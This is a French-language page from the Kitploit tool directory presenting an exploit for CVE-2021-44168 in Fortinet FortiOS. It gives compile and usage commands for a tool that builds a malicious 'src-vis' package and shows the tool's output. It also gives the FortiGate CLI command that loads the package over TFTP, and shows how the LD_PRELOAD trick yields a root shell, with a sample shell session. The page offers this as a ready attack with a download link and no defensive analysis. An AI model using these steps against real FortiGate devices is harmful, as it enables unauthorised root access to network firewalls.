Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44168 — Une vulnérabilité de téléchargement de code sans vérification d'intégrité dans la commande "execute restore src-vis" de FortiOS antérieur à la version 7.0.3. | Kitploit
Outils/GitHubGitHub/0xhaggis/cve-2021-44168
Analyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingDéveloppement de Charges UtilesExploitation de Binaires
GitHub0xhaggis/cve-2021-44168

CVE-2021-44168

Une vulnérabilité de téléchargement de code sans vérification d'intégrité dans la commande "execute restore src-vis" de FortiOS antérieur à la version 7.0.3.

Voir le dépôt
2122il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2021-44168

Objectif

Exploite CVE-2021-44168 pour déposer un shell sur un pare-feu Fortigate et activer son accès via des astuces LD_PRELOAD qui s'exécutent lors de l'utilisation de certaines commandes CLI de Fortigate. Vous obtenez un shell root.

Utilisation

Compilation :

root@kitploit:~
gcc -o gen_src-vis_pkg_file gen_src-vis_pkg_file.c -lz

Exécution :

root@kitploit:~
% ./gen_src-vis_pkg_file
./gen_src-vis_pkg_file [ -t | -p ] filename.img
  -t            Générer un paquet test, ou
  -p            Générer un paquet pwn.
  filename.img  Écrire dans ce fichier.

Mode test

Le mode test dépose un fichier appelé pwned.txt à la racine du système de fichiers du FortiGate. Créez un paquet test comme suit :

root@kitploit:~
% ./gen_src-vis_pkg_file -t test.img
[+] Generaing TEST package
[+] Reading test.tar for insertion into package file test.img
[+] Compressing test.tar (10240 bytes)
[+] Compressed size: 115
[+] Build pkg_header
[+] pkg_header crc32: 0x16a384f1
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xe097e419
[+] obj_header crc32: 0xabdfc3cb
[+] Write pkg_header + obj_header + obj_data > test.img
[+] All done. So long and thanks for all the fish!

Mode exploitation

Le mode exploitation crée un paquet de charge utile qui dépose un shell sur le FortiGate et l'active via des astuces LD_PRELOAD. Pour générer le paquet d'exploitation, exécutez l'exploit comme suit :

root@kitploit:~
% ./gen_src-vis_pkg_file -p pwn.img
[+] Generaing EXPLOIT package
[+] Reading pwn.tar for insertion into package file pwn.img
[+] Compressing pwn.tar (16465920 bytes)
[+] Compressed size: 6843825
[+] Build pkg_header
[+] pkg_header crc32: 0xd657d879
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data   crc32: 0xf373554b
[+] obj_header crc32: 0x3a7fdcd7
[+] Write pkg_header + obj_header + obj_data > pwn.img
[+] All done. So long and thanks for all the fish!

Utilisation du paquet malveillant pour obtenir un shell root

Depuis la CLI d'administration du FortiGate :

root@kitploit:~
FortiGate # execute restore src-vis tftp pwn.img 192.168.100.1
This operation will overwrite the current source visibility signatures!
Do you want to continue? (y/n)y

Please wait...

Connect to tftp server 192.168.100.1 ...
######

Get source visibility signatures from tftp server OK.
upd_manual_cid[255]-Updating src-vis plugin
doInstallUpdatePackage[981]-Full obj found for CIDB000
doInstallUpdatePackage[991]-Updating obj CIDB
installUpdateObject[323]-Step 1:Unpack obj 29, Total=1, cur=0
installUpdateObject[352]-Step 2:Prepare temp file for obj 29
installUpdObjRest[637]-Step 5:Backup /etc/cid.tar.gz->/tmp/update.backup
installUpdObjRest[651]-Step 6:Copy new object /tmp/updPiMCON->/etc/cid.tar.gz
installUpdObjRest[731]-Step 7:Validate object
installUpdObjRest[755]-Step 8:Re-initialize using new obj file
installUpdObjRest[767]-Step 9:Delete backup /tmp/update.backup
cid svr 13 req 4
__update_status[1181]-CIDB000 installed successfully
upd_status_save_status[114]-try to save on status file
upd_status_save_status[179]-Wrote status file
upd_manual_cid[284]-Update successful
./../../../../../data2/bfbin/rdate: Cannot create symlink to '/data2/bfbin/busybox'Error exit delayed from previous errorsupd_cfg_extract_unpacked2
upd_cfg_extract_cid_db_version[554]-version=06000000CIDB00000-00000.00000-0101010000
cid could not install sigs: version failed

FortiGate #

À ce stade, vous aurez un shell accessible via LD_PRELOAD sur les commandes CLI qui exécutent des sous-processus Linux. Une façon d'activer le shell nouvellement déposé :

root@kitploit:~
# fnsysctl ls
/ # 
/ # export PATH=/data2/bfbin:/bin
/ # uname -a
Linux FortiGate 3.2.16 #2 SMP Thu Mar 28 02:54:46 UTC 2019 x86_64 GNU/Linux

Analyse de la vulnérabilité

À déterminer. Lisez le code pour l'instant.

Télécharger l’outil